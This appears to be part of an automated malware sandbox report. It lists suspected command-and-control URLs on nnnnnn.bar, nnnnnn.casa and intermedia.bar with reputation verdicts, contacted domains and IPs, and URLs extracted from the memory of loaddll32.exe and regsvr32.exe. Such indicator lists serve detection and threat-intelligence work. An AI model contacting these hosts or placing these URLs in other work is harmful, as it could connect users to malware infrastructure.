http://nnnnnn.bar/drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk	100%	Avira URL Cloud	malware
http://intermedia.bar/drew/XRuGSIvrh83QGTYBTk/D9D3Vm19e/d5qtxwnIReenmX0dL_2F/z8AEjIs12VaPeEM7Fev/sHz_2Bx6bKLjtUULCEG0oV/GFai8cinvXLi4/iJJ7udwg/w0syzQHw_2FkzljAekHpIIx/DRVmfhCAjc/ZkwIrTh7UfbfcJWEg/EIPSCrhxM6nj/j9uYJZXC8_2/F6Btih0QBETHvA/LKTtsUnIUQHLFxaNR0li7/dM04PASCBbiQz0aa/qK64_2Bg_2B/VwE.jlk	0%	Avira URL Cloud	safe
http://intermedia.bar/	0%	Avira URL Cloud	safe
http://intermedia.bar/drew/	0%	Avira URL Cloud	safe
http://www.nnnnnn.casa/drew/clKY_2F9qhXNW5H/_2BsVRKIgOamiE9mQB/_2FVdwPGE/BPO6UbinW_2B8Sjp_2Bo/55Xmf7HJU6cUJy8fy4_/2FKKDKVKISZpEe4syLM93A/M41SvTBw4e_2F/120g53mI/wJJMq93zmJf2crfPUE2j_2B/GM6GQoMDYy/B7CUA1_2BisXnKYTP/uGoP10_2BxHm/imkRUl8or1j/Bw6x7_2BZqhh0x/t_2F833CW3gz1lZ3CY6hP/Kii0oYYxRGsc8HdH/lkRH05yG/dOy.jlk	100%	Avira URL Cloud	malware
http://nnnnnn.casa/drew/kntGHlOf6y1l7K/kCTU1frsUdQxnhn_2Fego/mw6bJXLxnfIRL2cj/FrdUucpG93hhEy_/2F_2F05Q3POeadiys1/9wLWHm6Gx/wqhNI29IdUdv3CWDyCfs/2VD0tBt0szHqPTGNMaP/H8c1RSlzmz7xA6aMxeunJS/egWxomuGkwbso/At2D20BI/siieXymS6PJr8im_2FPJeye/Czlrk0gGlx/B4_2FnRkW1_2FVYbi/FmMXH_2Bbn2q/9Abbe5hphXR/x.jlk	100%	Avira URL Cloud	malware
http://intermedia.bar/drew/69qrrEp29jAiA/GVIxoy3h/ZRI0if101gbT_2Fcb5gsrod/7F17KHpa_2/BUS9AgcQP0bD4Ff_2/FStFCHj7v78d/fK9WUSOh8lR/URjb3oWdvJZZ0U/IcrNV5CQkhMYnhHpv3KL_/2BKPAmbWZn4Vm75I/zFUrSlkXbMXjO5q/LefQPk4V1F4MoJTGv7/t20qtY8qJ/V_2FyM_2F_2BVYVAgqn_/2FAbaIbtwkp7Opl2EpV/O0v8KX5IGR5NLbF_2Blou0/BwiZZ.jlk	0%	Avira URL Cloud	safe
http://www.nnnnnn.casa/	100%	Avira URL Cloud	malware
http://nnnnnn.bar/drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXe	100%	Avira URL Cloud	malware
http://nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk	100%	Avira URL Cloud	malware
http://intermedia.bar/drew/QvhYBaeq_2F6Kr5S5lD/OqLkixN3sRa2UpR8i3hjYq/eJ9NYRqvvouL5/5HWqGU6L/VANwgL_2FOanliZpdSkommO/z_2FFnfFWj/XA9wFW7rsFws4V6TO/ECxua93xQfvB/2xJ5KsVMA_2/BJTXWzwMMI1Ry4/bSrLklQhxwLVQio5vEqnT/EuTu1lXMUBYE4EO9/fehTx7dve_2FJwl/oHCMlYRgtjfgvp4PcC/lf7RvC6QF/AJjhNY359JkAlb/_2BCF.jlk	0%	Avira URL Cloud	safe
http://nnnnnn.casa/drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5tIp9mQUoOfWLynTM/O86glIn9ihyHk/5dZsFtfy/gp_2FLvf0NHL3yVUkVbncwC/We6V8shIxB/_2BT5Ij9nSjAjmHue/61Ynbzrr_2B_/2FOk8Wface5/lcJD0_2FBb9PKs/3pUPEuZF5gHL68StfaFm9/KhGw_2FEloE_2FaF/OCoSTxCMO1I6oVZ/G3ADi.jlk	100%	Avira URL Cloud	malware
http://nnnnnn.casa/drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5	100%	Avira URL Cloud	malware
http://nnnnnn.bar/drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk	100%	Avira URL Cloud	malware
http://intermedia.bar/drew/eOqzQTB_2B/MowPwZPRMG1LVJR9t/fCLL0MMkzzZ7/Xm0aty4DHMK/aZD8fvqKlB4sn5/NqI7	0%	Avira URL Cloud	safe
http://nnnnnn.bar/drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301	100%	Avira URL Cloud	malware
http://intermedia.bar/drew/QvhYBaeq_2F6Kr5S5lD/OqLkixN3sRa2UpR8i3hjYq/eJ9NYRqvvouL5/5HWqGU6L/VANwgL_	0%	Avira URL Cloud	safe
http://nnnnnn.bar/drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk	100%	Avira URL Cloud	malware
http://intermedia.bar/drew/nTzA1Bin3XQcZS3BPXoT/VC_2Bwejhc_2FIgAnHO/80iaugMV57_2B03WjjJnn8/4gxAs_2BxmZF7/TOVjb2Ah/pgPNUHZ17T9L8wycKkEjCiK/jeMuH8DdRv/juOnp0_2FGJ7c6qP0/x_2Fz3dEM_2F/deoZvnQAfFk/Wc5jOa5bWcm0MC/RWrwyt3pkcQtiY4AsZ3n7/MKKE_2FX_2FFdYj9/qoI9Xq_2BCQEmwG/Nwb7IgT0IyCbKBnKn_/2FiegfuYZI5/GhR0CO9.jlk	0%	Avira URL Cloud	safe
http://www.nnnnnn.casa/drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP0gGdcDC1Vg/H9xTO58gw9Sr3I5f1oE/852oWfQLj1eL_2Fm_2FKnu/SIHTeaF7Bgvig/PyHxZLDk/ZUvCeNpaiixducNV9xRZlOg/1p1YKkAvPe/T6UiZU08MHesYFSbA/viVchsnOxqJ5/4YMncTmEmBk/k6T3NHIv66mymC/b7Hkig2fkyCUi/2.jlk	100%	Avira URL Cloud	malware
http://nnnnnn.casa/drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlk	100%	Avira URL Cloud	malware
http://intermedia.bar/drew/8GCWuTw3vFr_2BaLQHxEj/S2mZ_2Bs1ztZVt4J/tWEHNc4XanBwmnu/I2msIqz_2B6GZdxr2f	0%	Avira URL Cloud	safe
http://intermedia.bar/drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5s	0%	Avira URL Cloud	safe
http://nnnnnn.casa/drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LA	100%	Avira URL Cloud	malware
http://intermedia.bar	0%	Avira URL Cloud	safe
http://intermedia.bar/drew/QsS2jHAM_/2BwJZccmdp5m9iHVP9BE/Hy_2Bb24NYz6UUYImCo/zrhZsMNoFc_2FvJseSFb87	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
parkingpage.namecheap.com	198.54.117.218	true	false		high
intermedia.bar	31.41.46.120	true	true		unknown
nnnnnn.bar	162.255.119.177	true	true	13%, Virustotal, Browse	unknown
nnnnnn.casa	192.64.119.233	true	true	13%, Virustotal, Browse	unknown
www.nnnnnn.casa	unknown	unknown	true	7%, Virustotal, Browse	unknown
www.nnnnnn.bar	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://intermedia.bar/drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5seTAjCr_2BptR/zhdF_2B4iq_2F_2BdHZdbI/ppfIxjLZ1jFYb/jyraclx8/vY5o1N_2BBLJzcq8mbek0fq/sxBZO8XqCk/AZEFg4uupv5GBukaQ/chXIble8iRyF/2WTf0LlFxoi/1E61e67K_2BmUA/YOX2fReueqR9_2BbftFvZ/gzjKHMsB77w59NKXhfCT1/8O.jlk	true	Avira URL Cloud: safe	unknown
http://nnnnnn.bar/drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk	true	Avira URL Cloud: malware	unknown
http://intermedia.bar/drew/QsS2jHAM_/2BwJZccmdp5m9iHVP9BE/Hy_2Bb24NYz6UUYImCo/zrhZsMNoFc_2FvJseSFb87/xXKn3PzxfNPne/1IWtDw4e/zao8w3_2FqS1tUowEpdILrG/AQc_2F2CTQ/Kg84n698KmhLQ87R8/T3KY8S12PpxD/H69sMspGVxv/is2jKybUtpc7W2/tjpg5c_2BM2CHgmR9sa3h/opwZ5u985b9SYlvV/9nvFId2LU1FOjTP/3gzCgoFC/zqOGqAVh/K.jlk	true	Avira URL Cloud: safe	unknown
http://www.nnnnnn.casa/drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5tIp9mQUoOfWLynTM/O86glIn9ihyHk/5dZsFtfy/gp_2FLvf0NHL3yVUkVbncwC/We6V8shIxB/_2BT5Ij9nSjAjmHue/61Ynbzrr_2B_/2FOk8Wface5/lcJD0_2FBb9PKs/3pUPEuZF5gHL68StfaFm9/KhGw_2FEloE_2FaF/OCoSTxCMO1I6oVZ/G3ADi.jlk	true	Avira URL Cloud: malware	unknown
http://intermedia.bar/drew/zd0veKiw3e_2FVw/JJ7tbavOiQvA9d8rHF/MReVkRvio/SC3uRIruy_2BXo_2FvjQ/5wwzMoShaTYrGjtEhg7/Q4EU_2F58MrLDOMpnwDvQl/4oAzAGZ9KhB2P/11ho7azQ/oSQaJwmg4Z33JCzj8wVAL4y/p2pAzghuFr/NTjo_2FX5hnFJvVKJ/pSUsYhZ3ii5t/IXWGFfzs8Ne/P3kSZsDcK04c9o/M4TxQU3QgnIS7BTTFhUW8/eYRw_2Bi9Rap_2/FlW.jlk	true	Avira URL Cloud: safe	unknown
http://nnnnnn.casa/drew/clKY_2F9qhXNW5H/_2BsVRKIgOamiE9mQB/_2FVdwPGE/BPO6UbinW_2B8Sjp_2Bo/55Xmf7HJU6cUJy8fy4_/2FKKDKVKISZpEe4syLM93A/M41SvTBw4e_2F/120g53mI/wJJMq93zmJf2crfPUE2j_2B/GM6GQoMDYy/B7CUA1_2BisXnKYTP/uGoP10_2BxHm/imkRUl8or1j/Bw6x7_2BZqhh0x/t_2F833CW3gz1lZ3CY6hP/Kii0oYYxRGsc8HdH/lkRH05yG/dOy.jlk	true	Avira URL Cloud: malware	unknown
http://www.nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk	true	Avira URL Cloud: malware	unknown
http://www.nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk	true	Avira URL Cloud: malware	unknown
http://nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk	true	Avira URL Cloud: malware	unknown
http://nnnnnn.casa/drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP0gGdcDC1Vg/H9xTO58gw9Sr3I5f1oE/852oWfQLj1eL_2Fm_2FKnu/SIHTeaF7Bgvig/PyHxZLDk/ZUvCeNpaiixducNV9xRZlOg/1p1YKkAvPe/T6UiZU08MHesYFSbA/viVchsnOxqJ5/4YMncTmEmBk/k6T3NHIv66mymC/b7Hkig2fkyCUi/2.jlk	true	Avira URL Cloud: malware	unknown
http://intermedia.bar/drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk	true	Avira URL Cloud: safe	unknown
http://www.nnnnnn.casa/drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlk	true	Avira URL Cloud: malware	unknown
http://intermedia.bar/drew/QIymR1NV/VEHDP0tzxYyfhToi28JN0gN/4iuWFUXiYW/K0CJrXj0tnUEhVH78/U3kVKnzlLrQT/SmvkeHiBSVF/jSdieAe6QVgPYk/Ls60EE1RdzPENlayPGjHS/AIjKP7dUycBtEyrA/RFerBbxZvrxnd_2/Bc1S7J_2FQDJBAH3dG/kHsLUg6CP/6tr_2F_2FmCAcHtuBxvU/3I9dXvsa3LnrU2f8IF1/dsxBAmQu5x_2BsDF7qQMQs/L_2FeC4tc/dGJ.jlk	true	Avira URL Cloud: safe	unknown
http://intermedia.bar/drew/tN_2FPnM2JFaCc33jtc/NPCaV6rrqIxKNKP7n1AR3O/LMe16EhvI_2Bi/SLNSQXLS/EviOTr3wnTfM22OhIhFDrhX/abhGbeDg_2/F32j7cFeBDC9GyCao/m10xhdMb4CCa/7HwtF9C64_2/F3b31QlJIQy42X/zsnIbRG3JRJ596u8kc4vW/CJEx7Xa659BvZ2yV/10sCxMgGuLgu5f6/Z9JRI8lQTnPNjwZZMu/mc129Uq8I/WlhkxbiPfyst/snQ.jlk	true	Avira URL Cloud: safe	unknown
http://nnnnnn.bar/drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk	true	Avira URL Cloud: malware	unknown
http://www.nnnnnn.casa/drew/kntGHlOf6y1l7K/kCTU1frsUdQxnhn_2Fego/mw6bJXLxnfIRL2cj/FrdUucpG93hhEy_/2F_2F05Q3POeadiys1/9wLWHm6Gx/wqhNI29IdUdv3CWDyCfs/2VD0tBt0szHqPTGNMaP/H8c1RSlzmz7xA6aMxeunJS/egWxomuGkwbso/At2D20BI/siieXymS6PJr8im_2FPJeye/Czlrk0gGlx/B4_2FnRkW1_2FVYbi/FmMXH_2Bbn2q/9Abbe5hphXR/x.jlk	true	Avira URL Cloud: malware	unknown
http://nnnnnn.bar/drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk	true	Avira URL Cloud: malware	unknown
http://nnnnnn.bar/drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXerenZMQrHRZSYD/VcSbOgQ4IlG13pzT/ChkByFeJgylnSMo/4J21EhXoNQISdnhc3f/NxfTAQr9R/8AgL4hXYk037vjAEEtbw/scGCC9PMQ_2B12F0Y7F/91NWW_2BZGG2Q_2FmG1R8Q/UvRceMmRjthxs/fcmtDNQF/YB8wWAPTg/lMDx0uVFsyOE/w.jlk	true	Avira URL Cloud: malware	unknown
http://intermedia.bar/drew/XRuGSIvrh83QGTYBTk/D9D3Vm19e/d5qtxwnIReenmX0dL_2F/z8AEjIs12VaPeEM7Fev/sHz_2Bx6bKLjtUULCEG0oV/GFai8cinvXLi4/iJJ7udwg/w0syzQHw_2FkzljAekHpIIx/DRVmfhCAjc/ZkwIrTh7UfbfcJWEg/EIPSCrhxM6nj/j9uYJZXC8_2/F6Btih0QBETHvA/LKTtsUnIUQHLFxaNR0li7/dM04PASCBbiQz0aa/qK64_2Bg_2B/VwE.jlk	true	Avira URL Cloud: safe	unknown
http://www.nnnnnn.casa/drew/clKY_2F9qhXNW5H/_2BsVRKIgOamiE9mQB/_2FVdwPGE/BPO6UbinW_2B8Sjp_2Bo/55Xmf7HJU6cUJy8fy4_/2FKKDKVKISZpEe4syLM93A/M41SvTBw4e_2F/120g53mI/wJJMq93zmJf2crfPUE2j_2B/GM6GQoMDYy/B7CUA1_2BisXnKYTP/uGoP10_2BxHm/imkRUl8or1j/Bw6x7_2BZqhh0x/t_2F833CW3gz1lZ3CY6hP/Kii0oYYxRGsc8HdH/lkRH05yG/dOy.jlk	true	Avira URL Cloud: malware	unknown
http://nnnnnn.casa/drew/kntGHlOf6y1l7K/kCTU1frsUdQxnhn_2Fego/mw6bJXLxnfIRL2cj/FrdUucpG93hhEy_/2F_2F05Q3POeadiys1/9wLWHm6Gx/wqhNI29IdUdv3CWDyCfs/2VD0tBt0szHqPTGNMaP/H8c1RSlzmz7xA6aMxeunJS/egWxomuGkwbso/At2D20BI/siieXymS6PJr8im_2FPJeye/Czlrk0gGlx/B4_2FnRkW1_2FVYbi/FmMXH_2Bbn2q/9Abbe5hphXR/x.jlk	true	Avira URL Cloud: malware	unknown
http://intermedia.bar/drew/69qrrEp29jAiA/GVIxoy3h/ZRI0if101gbT_2Fcb5gsrod/7F17KHpa_2/BUS9AgcQP0bD4Ff_2/FStFCHj7v78d/fK9WUSOh8lR/URjb3oWdvJZZ0U/IcrNV5CQkhMYnhHpv3KL_/2BKPAmbWZn4Vm75I/zFUrSlkXbMXjO5q/LefQPk4V1F4MoJTGv7/t20qtY8qJ/V_2FyM_2F_2BVYVAgqn_/2FAbaIbtwkp7Opl2EpV/O0v8KX5IGR5NLbF_2Blou0/BwiZZ.jlk	true	Avira URL Cloud: safe	unknown
http://nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk	true	Avira URL Cloud: malware	unknown
http://intermedia.bar/drew/QvhYBaeq_2F6Kr5S5lD/OqLkixN3sRa2UpR8i3hjYq/eJ9NYRqvvouL5/5HWqGU6L/VANwgL_2FOanliZpdSkommO/z_2FFnfFWj/XA9wFW7rsFws4V6TO/ECxua93xQfvB/2xJ5KsVMA_2/BJTXWzwMMI1Ry4/bSrLklQhxwLVQio5vEqnT/EuTu1lXMUBYE4EO9/fehTx7dve_2FJwl/oHCMlYRgtjfgvp4PcC/lf7RvC6QF/AJjhNY359JkAlb/_2BCF.jlk	true	Avira URL Cloud: safe	unknown
http://nnnnnn.casa/drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5tIp9mQUoOfWLynTM/O86glIn9ihyHk/5dZsFtfy/gp_2FLvf0NHL3yVUkVbncwC/We6V8shIxB/_2BT5Ij9nSjAjmHue/61Ynbzrr_2B_/2FOk8Wface5/lcJD0_2FBb9PKs/3pUPEuZF5gHL68StfaFm9/KhGw_2FEloE_2FaF/OCoSTxCMO1I6oVZ/G3ADi.jlk	true	Avira URL Cloud: malware	unknown
http://nnnnnn.bar/drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk	true	Avira URL Cloud: malware	unknown
http://nnnnnn.bar/drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk	true	Avira URL Cloud: malware	unknown
http://intermedia.bar/drew/nTzA1Bin3XQcZS3BPXoT/VC_2Bwejhc_2FIgAnHO/80iaugMV57_2B03WjjJnn8/4gxAs_2BxmZF7/TOVjb2Ah/pgPNUHZ17T9L8wycKkEjCiK/jeMuH8DdRv/juOnp0_2FGJ7c6qP0/x_2Fz3dEM_2F/deoZvnQAfFk/Wc5jOa5bWcm0MC/RWrwyt3pkcQtiY4AsZ3n7/MKKE_2FX_2FFdYj9/qoI9Xq_2BCQEmwG/Nwb7IgT0IyCbKBnKn_/2FiegfuYZI5/GhR0CO9.jlk	true	Avira URL Cloud: safe	unknown
http://www.nnnnnn.casa/drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP0gGdcDC1Vg/H9xTO58gw9Sr3I5f1oE/852oWfQLj1eL_2Fm_2FKnu/SIHTeaF7Bgvig/PyHxZLDk/ZUvCeNpaiixducNV9xRZlOg/1p1YKkAvPe/T6UiZU08MHesYFSbA/viVchsnOxqJ5/4YMncTmEmBk/k6T3NHIv66mymC/b7Hkig2fkyCUi/2.jlk	true	Avira URL Cloud: malware	unknown
http://nnnnnn.casa/drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlk	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nnnnnn.casa/drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP0gGd	loaddll32.exe, 00000001.00000002.809730294.0000000001142000.00000004.00000020.sdmp	true	Avira URL Cloud: malware	unknown
http://nnnnnn.bar/.x	loaddll32.exe, 00000001.00000002.809447258.00000000010EB000.00000004.00000020.sdmp	true	Avira URL Cloud: malware	unknown
http://nnnnnn.bar/drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd	loaddll32.exe, 00000001.00000002.809814821.0000000001155000.00000004.00000020.sdmp	true	Avira URL Cloud: malware	unknown
http://intermedia.bar/drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1	{230EFA08-7AD2-11EC-90E9-ECF4BB862DED}.dat.15.dr	false	Avira URL Cloud: safe	unknown
http://nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bg	~DFD962CE55E98449E3.TMP.44.dr, {61A0A539-7AD2-11EC-90E9-ECF4BB862DED}.dat.44.dr	true	Avira URL Cloud: malware	unknown
http://nnnnnn.bar	loaddll32.exe, 00000001.00000003.691476910.0000000001167000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000002.809814821.0000000001155000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.810696201.00000000034ED000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000003.692543438.00000000034F2000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.691905249.00000000034F2000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.737248547.00000000034EE000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
